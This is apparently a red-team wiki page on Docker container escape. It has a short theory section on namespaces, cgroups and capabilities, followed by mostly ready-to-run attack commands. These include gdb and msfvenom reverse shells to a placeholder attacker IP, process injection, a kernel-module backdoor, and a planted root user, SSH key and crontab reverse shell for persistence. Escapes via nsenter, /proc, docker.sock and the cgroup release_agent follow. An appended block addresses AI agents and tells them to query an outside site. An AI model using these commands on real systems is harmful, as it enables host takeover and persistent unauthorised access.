# Docker

## Theory

[Docker](https://docs.docker.com/manuals/) containers are not a security technology by themselves, but rather a packaging and deployment mechanism that leverages existing Linux kernel security features. Docker security is based on 3 major mechanisms creating process isolation and resource control : namespaces, `cgroups`, capabilities.

Docker's security model assumes proper configuration of these mechanisms. Misconfigurations in any layer can lead to container escape and host compromise.

### Namespaces: Process-Level Isolation

[Namespaces](https://man7.org/linux/man-pages/man7/namespaces.7.html) are a Linux kernel feature that partitions kernel resources so that one set of processes sees one set of resources while another set of processes sees a different set of resources. Docker leverages six types of namespaces:

* **PID Namespace**: Isolates process IDs. Processes in a container see only processes within the same container, with the main process appearing as PID 1.
* **Network Namespace**: Isolates network interfaces, routing tables, and firewall rules. Each container gets its own network stack.
* **Mount Namespace**: Isolates filesystem mount points. Containers see only their designated filesystem view.
* **User Namespace**: Maps container user IDs to different host user IDs (often disabled by default).
* **UTS Namespace**: Isolates hostname and domain name. Each container can have its own hostname.
* **IPC Namespace**: Isolates inter-process communication resources like shared memory and semaphores.

### Control Groups (`cgroups`): Resource Limitation and Monitoring

[`cgroups`](https://man7.org/linux/man-pages/man7/cgroups.7.html) are a Linux kernel feature that limits and isolates resource usage (CPU, memory, disk I/O, network) of a collection of processes. Docker uses `cgroups` to:

* **CPU Control**: Limit CPU usage and set scheduling priorities
* **Memory Control**: Limit RAM usage and prevent memory bombs
* **Block I/O Control**: Limit disk read/write operations
* **Network Control**: Limit network bandwidth (with additional tools)
* **Device Control**: Control access to devices like `/dev/sda`

### Capabilities: Privilege Control

Traditional Unix systems have a binary privilege model: root (UID 0) has all privileges, while non-root users have limited privileges. [Linux capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) break down root privileges into distinct units, allowing fine control over what privileged operations a process can perform.

Docker containers run with a restricted set of capabilities by default, dropping dangerous ones like:

* `CAP_SYS_ADMIN` (system administration)
* `CAP_SYS_MODULE` (kernel module loading)
* `CAP_SYS_PTRACE` (process tracing)
* `CAP_DAC_OVERRIDE` (override permissions sets by file owners)
* `CAP_SETUID CAP_SETGID` (modify it's own user or group set)
* `CAP_NET_ADMIN` (handle network related tasks on the host)

***

## Practice

In real life situation we will need to perform a Docker container escape after obtaining a foothold on a running container. Those escape techniques allows to pivot to the host running the container and thus gain privileges.

**Rapid Security Assessment**

When landing on an asset running docker containers, the following command can help obtain crucial information that could be helpful for PrivEsc.

```bash
# Security check for running containers
docker ps -q | xargs docker inspect | jq '.[] | {
  Name: .Name,
  Privileged: .HostConfig.Privileged,
  Capabilities: .HostConfig.CapAdd,
  Mounts: [.Mounts[] | select(.Type=="bind") | .Source],
  PidMode: .HostConfig.PidMode,
  NetworkMode: .HostConfig.NetworkMode
}'
```

### Capabilities Abuse

Docker drops many dangerous capabilities by default, but **adding back a single high-risk capability can fully break isolation**.

**High-risk capabilities include:**

* `CAP_SYS_ADMIN` (most dangerous)
* `CAP_SYS_PTRACE`
* `CAP_SYS_MODULE`
* `CAP_DAC_OVERRIDE`
* `CAP_NET_ADMIN`
* `CAP_SETUID`, `CAP_SETGID`

Privileged containers (`--privileged`) disable most security features, granting nearly all capabilities and device access. They provide multiple escape vectors.

#### Detection

```bash
# If capsh is available in the container
capsh --print
capsh --decode=$(grep CapEff /proc/self/status | awk '{print $2}')

# Manual way (requires capsh on the attack machine)
cat /proc/self/status | grep Cap
capsh --decode=<CapEff_value>
```

If `CapEff` is close to `0000003fffffffff` means that this container is effectively **privileged**

#### `CAP_SYS_ADMIN`

`CAP_SYS_ADMIN` allows mounting filesystems, creating namespaces, and accessing devices. In a Docker escape context you can thus mount the host file system into the container directly.

**Direct disk mount:**

<pre class="language-bash"><code class="lang-bash"><strong># Requires /dev/sda to be mounted
</strong><strong>mkdir /mnt/host
</strong>mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
</code></pre>

Not guaranteed with `CAP_SYS_ADMIN` alone.

**Mount namespace manipulation :**

```bash
# Mount 
unshare -m
mount -t proc proc /proc
mount /dev/sda1 /mnt
```

Always possible with `CAP_SYS_ADMIN`h but does **not** equal host escape by itself. This gives **filesystem control inside the container**, not the host.

| Condition                                 | Can mount host FS? |
| ----------------------------------------- | ------------------ |
| CAP\_SYS\_ADMIN only                      | No                 |
| CAP\_SYS\_ADMIN + privileged              | Yes                |
| CAP\_SYS\_ADMIN + /dev mount              | Yes                |
| CAP\_SYS\_ADMIN + docker.sock             | Yes                |
| CAP\_SYS\_ADMIN + correct Docker defaults | No                 |

#### `CAP_SYS_PTRACE`

`CAP_SYS_PTRACE` and `–pid=host` allows attaching to host processes and executing code in their context. The flag **`–pid=host`** allows a container to operate within the same process namespace as the host system.

**Host-level code execution** (requires gdb)**:**

```bash
echo 0 > /proc/sys/kernel/yama/ptrace_scope
gdb -p 1 -batch -ex "call system(\"/bin/bash\")"
gdb -p 1 -batch -ex "call system(\"bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1\")"
```

**Process injection:**

```bash
# Create payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw -o payload.bin

# Upload payload and injector to the container
# In the container, identify the process running as root in the host system to gain root access for a callback.
ps auxx | grep root

# Inject the payload in the process
./injector <root-process-pid> payload.bin

# Open listener on attack device
 pwncat-cs -lp <attacker_port>

```

The injector I use:

{% embed url="<https://github.com/gaffe23/linux-inject>" %}

#### `CAP_SYS_MODULE`

`CAP_SYS_MODULE` allows loading arbitrary kernel modules, leads to **instant host compromise**.

```bash
insmod backdoor.ko
```

The Kernel module backdoor I use:

{% embed url="<https://github.com/matheuspd/Linux-Kernel-Module-Backdoor-Demonstration>" %}

#### `CAP_DAC_OVERRIDE`

`CAP_DAC_OVERRIDE` allows to bypass file permission checks (requires host file system mount).

```bash
# If host root mounted at /host
chroot /host /bin/bash

# Create backdoor user
echo "backdoor:x:0:0::/root:/bin/bash" >> /host/etc/passwd
echo "backdoor:\$6\<salt>\<hash>" >> /host/etc/shadow

# Install SSH key
mkdir -p /host/root/.ssh
echo "ssh-rsa AAAAB3... attacker" >> /host/root/.ssh/authorized_keys

# Persistent access via cron
echo "* * * * * root bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" >> /host/etc/crontab
```

### Namespaces Abuse

If a container shares namespaces with the host or gains the ability to enter them, isolation collapses.

**Dangerous namespace configurations:**

* `--pid=host`
* `--net=host`
* `--ipc=host`
* Writable `/proc`, `/sys`
* `nsenter` available

#### Detection

```bash
# Inside a container
ls -l /proc/1/ns

# Outside a container
docker inspect <container> | jq '.HostConfig'
```

Look for:

* `PidMode: "host"`
* `NetworkMode: "host"`

#### PID Namespace Escape (`--pid=host`)

Host processes are visible and targetable.

```bash
nsenter -t 1 -m -u -i -n -p /bin/bash
```

You we now **inside the host namespaces**.

#### `/proc` Abuse

`/proc` exposes kernel and process internals.

```bash
ls /proc/1/root
chroot /proc/1/root /bin/bash
```

This is one of the **simplest real-world escapes**.

#### Mount Namespace Abuse

Writable mount namespaces allow filesystem manipulation.

```bash
mount | grep "/"
mount -o remount,rw /
```

#### Docker Socket Namespace Escape

Docker socket allows to reach the Docker Engine API from a container thanks to the socket. If Docker CLI is available on the container you can interact with other containers, spin new ones, ...

```bash
# Search for docker.sock, could be somewhere else
ls -la /var/run/docker.sock

# Check if the Docker Engine API is reachable
docker ps
```

Spin a new container with a host bind mount and privileges:

```bash
docker run -it --privileged -v /:/mnt alpine chroot /mnt /bin/sh
```

This is the **most common container escape in the wild**.

### `cgroups` Abuse

Cgroups limit resources, but misconfigured cgroups can be abused to **execute code on the host**. This attack is **independent of Docker** and targets the Linux kernel directly.

#### Detection

```bash
mount | grep cgroup
ls /sys/fs/cgroup
```

Writable cgroup mounts are a red flag.

#### cgroup `release_agent` Escape

When a cgroup is released, the kernel executes a user-defined binary **on the host**.

```bash
mkdir /tmp/cgrp
mount -t cgroup memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
echo "/bin/bash" > /tmp/cgrp/release_agent
echo $$ > /tmp/cgrp/x/cgroup.procs
```

This results in **host command execution**.

## Resources

{% embed url="<https://blog.nody.cc/posts/container-breakouts-part3/>" %}

{% embed url="<https://blog.nody.cc/posts/container-breakouts-part2/>" %}

{% embed url="<https://blog.nody.cc/posts/container-breakouts-part1/>" %}

{% embed url="<https://redfoxsec.com/blog/exploiting-excessive-container-capabilities/>" %}

{% embed url="<https://book.hacktricks.wiki/en/network-services-pentesting/2375-pentesting-docker.html#docker-basics>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/cloud-cicd-pentesting/ci-cd/docker.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
